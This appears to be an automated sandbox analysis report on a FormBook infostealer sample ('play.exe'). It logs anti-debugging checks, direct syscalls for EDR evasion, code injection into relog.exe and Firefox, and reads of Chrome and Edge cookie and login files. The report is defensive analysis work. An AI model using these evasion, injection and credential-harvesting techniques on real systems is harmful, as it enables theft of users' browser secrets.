Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4AD0 mov eax, dword ptr fs:[00000030h]	0_2_026C4AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4AD0 mov eax, dword ptr fs:[00000030h]	0_2_026C4AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698AA0 mov eax, dword ptr fs:[00000030h]	0_2_02698AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698AA0 mov eax, dword ptr fs:[00000030h]	0_2_02698AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6AA4 mov eax, dword ptr fs:[00000030h]	0_2_026E6AA4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764A80 mov eax, dword ptr fs:[00000030h]	0_2_02764A80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8A90 mov edx, dword ptr fs:[00000030h]	0_2_026C8A90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268CB7E mov eax, dword ptr fs:[00000030h]	0_2_0268CB7E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EB50 mov eax, dword ptr fs:[00000030h]	0_2_0273EB50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02738B42 mov eax, dword ptr fs:[00000030h]	0_2_02738B42
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726B40 mov eax, dword ptr fs:[00000030h]	0_2_02726B40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726B40 mov eax, dword ptr fs:[00000030h]	0_2_02726B40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275AB40 mov eax, dword ptr fs:[00000030h]	0_2_0275AB40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688B50 mov eax, dword ptr fs:[00000030h]	0_2_02688B50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744B4B mov eax, dword ptr fs:[00000030h]	0_2_02744B4B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744B4B mov eax, dword ptr fs:[00000030h]	0_2_02744B4B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEB20 mov eax, dword ptr fs:[00000030h]	0_2_026BEB20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEB20 mov eax, dword ptr fs:[00000030h]	0_2_026BEB20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02758B28 mov eax, dword ptr fs:[00000030h]	0_2_02758B28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02758B28 mov eax, dword ptr fs:[00000030h]	0_2_02758B28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764B00 mov eax, dword ptr fs:[00000030h]	0_2_02764B00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271CBF0 mov eax, dword ptr fs:[00000030h]	0_2_0271CBF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEBFC mov eax, dword ptr fs:[00000030h]	0_2_026BEBFC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EBD0 mov eax, dword ptr fs:[00000030h]	0_2_0273EBD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744BB0 mov eax, dword ptr fs:[00000030h]	0_2_02744BB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744BB0 mov eax, dword ptr fs:[00000030h]	0_2_02744BB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0BBE mov eax, dword ptr fs:[00000030h]	0_2_026A0BBE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0BBE mov eax, dword ptr fs:[00000030h]	0_2_026A0BBE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726870 mov eax, dword ptr fs:[00000030h]	0_2_02726870
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726870 mov eax, dword ptr fs:[00000030h]	0_2_02726870
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E872 mov eax, dword ptr fs:[00000030h]	0_2_0271E872
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E872 mov eax, dword ptr fs:[00000030h]	0_2_0271E872
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A2840 mov ecx, dword ptr fs:[00000030h]	0_2_026A2840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694859 mov eax, dword ptr fs:[00000030h]	0_2_02694859
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694859 mov eax, dword ptr fs:[00000030h]	0_2_02694859
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0854 mov eax, dword ptr fs:[00000030h]	0_2_026C0854
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273483A mov eax, dword ptr fs:[00000030h]	0_2_0273483A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273483A mov eax, dword ptr fs:[00000030h]	0_2_0273483A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA830 mov eax, dword ptr fs:[00000030h]	0_2_026CA830
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov ecx, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C810 mov eax, dword ptr fs:[00000030h]	0_2_0271C810
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A8E4 mov eax, dword ptr fs:[00000030h]	0_2_0275A8E4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC8F9 mov eax, dword ptr fs:[00000030h]	0_2_026CC8F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC8F9 mov eax, dword ptr fs:[00000030h]	0_2_026CC8F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE8C0 mov eax, dword ptr fs:[00000030h]	0_2_026BE8C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027608C0 mov eax, dword ptr fs:[00000030h]	0_2_027608C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C89D mov eax, dword ptr fs:[00000030h]	0_2_0271C89D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690887 mov eax, dword ptr fs:[00000030h]	0_2_02690887
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov eax, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov edx, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov eax, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734978 mov eax, dword ptr fs:[00000030h]	0_2_02734978
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734978 mov eax, dword ptr fs:[00000030h]	0_2_02734978
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C97C mov eax, dword ptr fs:[00000030h]	0_2_0271C97C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764940 mov eax, dword ptr fs:[00000030h]	0_2_02764940
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710946 mov eax, dword ptr fs:[00000030h]	0_2_02710946
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0272892B mov eax, dword ptr fs:[00000030h]	0_2_0272892B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271892A mov eax, dword ptr fs:[00000030h]	0_2_0271892A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C912 mov eax, dword ptr fs:[00000030h]	0_2_0271C912
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688918 mov eax, dword ptr fs:[00000030h]	0_2_02688918
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688918 mov eax, dword ptr fs:[00000030h]	0_2_02688918
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E908 mov eax, dword ptr fs:[00000030h]	0_2_0270E908
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E908 mov eax, dword ptr fs:[00000030h]	0_2_0270E908
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E9E0 mov eax, dword ptr fs:[00000030h]	0_2_0271E9E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C29F9 mov eax, dword ptr fs:[00000030h]	0_2_026C29F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C29F9 mov eax, dword ptr fs:[00000030h]	0_2_026C29F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A9D3 mov eax, dword ptr fs:[00000030h]	0_2_0275A9D3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027269C0 mov eax, dword ptr fs:[00000030h]	0_2_027269C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C49D0 mov eax, dword ptr fs:[00000030h]	0_2_026C49D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov esi, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov eax, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov eax, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD mov eax, dword ptr fs:[00000030h]	0_2_026909AD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD mov eax, dword ptr fs:[00000030h]	0_2_026909AD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE70C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00BE70C8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE8B7B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00BE8B7B

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenKeyEx: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryValueKey: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtTerminateThread: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\play.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\play.exe	Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread register set: target process: 7852

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread APC queued: target process: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BE86AF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00BE86AF

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
